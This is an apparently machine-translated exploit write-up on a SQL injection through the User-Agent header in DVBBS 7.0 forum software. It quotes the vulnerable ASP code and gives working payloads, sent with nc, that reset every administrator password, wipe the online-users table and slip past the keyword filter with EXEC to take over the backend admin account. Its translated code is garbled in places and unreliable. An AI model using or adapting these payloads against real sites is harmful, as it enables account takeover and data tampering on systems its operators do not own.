The previous time, the vulnerability uploaded by the avatar of the mobile network forum brings difficult healing in the website of the DVBBS Forum, and this vulnerability even ends the version of SP2. In order to solve this problem, the beach kid may also be exhausted. But is it really safe to this? The answer is negative, this is not a vulnerability in the htt_user_agent variable, want to know more, please listen to me slowly. Vulnerability file: inc / dv_clsmain.asp test environment: dvbbs7.0.0 mssqldvbbs7.0.0 sp1 mssqldvbbs7.0.0 sp2 mssql server os: windows 2000 advanced server never once found loopholes in dvbbs6.x released on http_user_agent variable filter is not The injection vulnerability caused by severely, I thought that this time I should filter it in DVBBS7.0. But after reading the code, I will prove my idea is wrong. As long as you have a clever constructor, you can implement an injection of forums using the MSSQL database. Let us first take a look at the code of the vulnerability.
DVBBS7.0.0 & DVBBS7.0.0 SP1 Inc / DV_clsmain.asp files 1745-1755 Behavior: agent = request.servervariables ("http_user_agent") agent = split (agent, ";") if INSTR (Agent (1), "msie")> 0 thnbrowser = "Microsoft Internet Explorer" Version = Trim (Replace (Agent (1), "Msie", "", 6)) Elseif Instr (Agent (4), "Netscape")> 0 THEN BROWSER = "Netscape" DIM TMPSTRTMPSTR = Split (Agent (4), "/") Version = TmpStr (Ubound (Tmpstr)) End (Tmpstr)) End (Tmpstr)) End IFDVBBS7.0.0 SP2 Inc / DV_clsmain.asp file No. 1919-1938 Behavior: Agent = Request.serverVariables ("http_user_Agent") 'agent = "Opera / 7.23 (x11; Linux i686; u) [en]" if left (agent, 7) = "mozilla" then "There is this identity as browser agent = Split (Agent, ";") IF INSTR (Agent (1), "MSIE")> 0 ThenBrowser = "Microsoft Internet Explorer" Version = Trim (Replace (Agent (1), "Msie", "", 6)) Elseif Instr (Agent (4), "Netscape")> 0 THEN Browser = "Netscape" Tmpstr = Split (Agent (4), "/") Version = Tmpstr (Ubound (Tmpstr)) Elseif Instr (Agent) 4), "RV:")> 0 THENBROWSER = "mozilla" Tmpstr = Split (Agent (4), ":") Version = Tmpstr (Ubound (Tmpstr)) IF INSTR (Version, ")")> 0 THEN TMPSTR = Split (Version, ")") Version = TMPS Tr (0) end ifndiff This two-segment code is part of the CLASS CLS_BROWSER to determine the user's browser type and version. However, there is the same problem in these two codes, that is, when the Netscape contains Netscape, the value of the string is directly returned to the Version variable, but what can this? ? Then look down again.
Some code in the useerActiveOnline function in this file (three versions of content) is: DIM statuseridstatuserid = session (Cachename & "Userid") (0) SQL = "SELECT ID, BOARDID from [DV_Online] where id =" & ccur (statuserid) set rs = execute (sql) if rs.eof and rs.bof thenif cint (forum_setting (36)) = 0 thenactcome = "" elseactcome = address (uip) end ifset browsertype = new cls_browsersql = "insert into [DV_Online] (ID, Username, UserClass, IP, Startime, LastimeBk, BoardID, Browser, Stats, UserGroupid, Actcome, Userhidden) Values ("& Statuserid &", 'Guest', 'Guest', '"& Usertrueip &" ', "& SQLNOWSTRING &", "& BoardID &",' "& Browsertype.Platform &" & browsertype.browser & browsertype.version & "" & repeate (LEFT (stats, 250), "'" "" "" & "', 7, '" & actcom "'" "& userhidden &") "" Update Cache Total Online Data Myboardonline.forum_Online = MyboardonLine.forum_Online 1Name = "Forum_Online" value = myboardonline .forum_onlineset browsertype = nothing elsesql = "Update [DV_OnLine] set lastimebk =" & sqlnowstring ", boardid =" & boardid & ", stats = '" & replace (stats, "'", "" ) & "'Where id =" & ccur (statuserid) endiffs = NothingExecute (SQL) Obviously, after the Version's value is obtained, it is directly inserted into the SQL variable in the statement of the SQL variable. Database. Inquire.
The code for statement filtration in the Execute function is: if INSTR (LCase (Command), "DV_ADMIN")> 0 and Left (ScriptName, 6) <> "admin_" Then Response.write Savesesqllog (Command, ") 'translation English Command = Replace (Lcase (Command), "DV_ADMIN", "DV " & chr (95) & " admin") End if, as long as there is no DV_ADMIN key in our statement It can be passed smoothly. Although the idea has been opened, the existence of the anti-refreshing mechanism in the mobile network forum has brought great difficulties to our vulnerabilities. But there is still a way to solve it, or step by step, how do I test this vulnerability? Small tapping knife as an example of DV_clsmain.asp file in SP1, in the ActiveOnline function IF datediff ("s", reflashpageLasttime, now ()) <120 and lastvisiboardid = BoardId THEN EXIT SUB is the key to the anti-refresh mechanism The statement, in order to avoid it, in order to avoid it, it will be annotated. Then use WSE to access the MIME data capture when accessing index.asp, the data obtained is: get /dex.asp http / 1.1accept: * / * accept-language: en-cnaccept-encoding: gzip, deflateuser-agent: mozilla /4.0 (compatible; msie 6.0; windows nt 5.2; .net clr 1.1.4322) host: www.somesite.comconnection: keep-alivecookie: dnetpubtemp = statuserid = 2110913640; aspsessionidcqcbbscq = dmlbhjaajfofclflencdepgg value user-agent therein will correspond to The value of the request.serverVariables ("http_user_agent") in the code, so any modification of the database can only be implemented if the user-agent is constructed as a SQL statement. Since the DV_ADMIN keyword is filtered in the Execute function, we have to first modify the password of the front desk administrator. Modify the value of the user-agent to Mozilla / 4.0 (Compatible; M; M; ',' Hacker ', 7,' ', 2) Update DV_USER SET UserPassword =' 123 'Where usergroupiD = 1-netscape then use NC Send, as shown
When the NC runs, it is found that all the front desk administrator passwords have been modified to 123. At the same time, the data of the ID = 2110913640 is also recorded in the DV_ONLINE table, as we think, its browser = ' Unknown | Netscape ', Stats =' Hacker '. It can be seen that the injection is fully implemented by constructing the value of the user-agent. Solution to the new problem of brushing, just for the test, it is commented to the refreshing key statement, and now change it back. In this way, we face a very difficult problem. Since our access procedure records the corresponding access data in the DV_Online table, as long as this data exists, it will not perform the statement we want to jump to the injectable. Therefore, I have to call the MYBOARDONLINE.OnlineQuery process after waiting for another user access, the timeout user access record (including our access record) can only be deceived again. Otherwise, let us only update our last time to the current value, but there is no impact on other data. The time interval between every two deception is 20 minutes! So if you want to write to the Trojan to the database, you should not wait until your hair is also white. You may say that I am dialing online, just re-dialing? Of course, it can be, even though this is a painful thing for us. In order to solve this tricky problem, we can delete all records in the DV_ONLINE table while modifying the database, which will not be injected continuously. The value of the user-agent after adjustment is: mozilla / 4.0 (compatible; m; m; m; ',' Hacker ', 7,' ', 2) update dv_user set userpassword =' 123 'Where usergroupid = 1 delete from DV_Online -Netscape does not believe you, no matter how much user access record in the database, as long as you can succeed, all the front desk administrator password will be modified, but also remove all user access records. Clean clean. Haha, now we can't do it with your heart, as long as you think, as long as the database users have sufficient permissions. Wait a minute, if the user does not have enough permissions, it is to modify the password of the front desk administrator. Is it true that the background administrator really bored? Don't worry, please look at it. Break through the Execute filtering, enter the background by filtering the DV_ADMIN keyword in the Execute function, so avoiding its appearance when using the SQL query statement. But we can't give up the injection of the DV_ADMIN table, otherwise, if you don't give up. Later, under the inspiration of "SQL Injection White Paper", I used the EXEC function to successfully solve this problem. If the value of the user-agent is modified to Mozilla / 4.0 (compatible; m; m; m; ',' Hacker ', 7,' ', 2) Declare @A nvarchar (255) SELECT @ a =' update DV _ ' 'admin set username =' firstsee '', password = '' '' '' exec (@a) -netscape can successfully modify the value of all recorded Username in DV_ADMIN to Firstsee, and the value of Password is modified to 123.
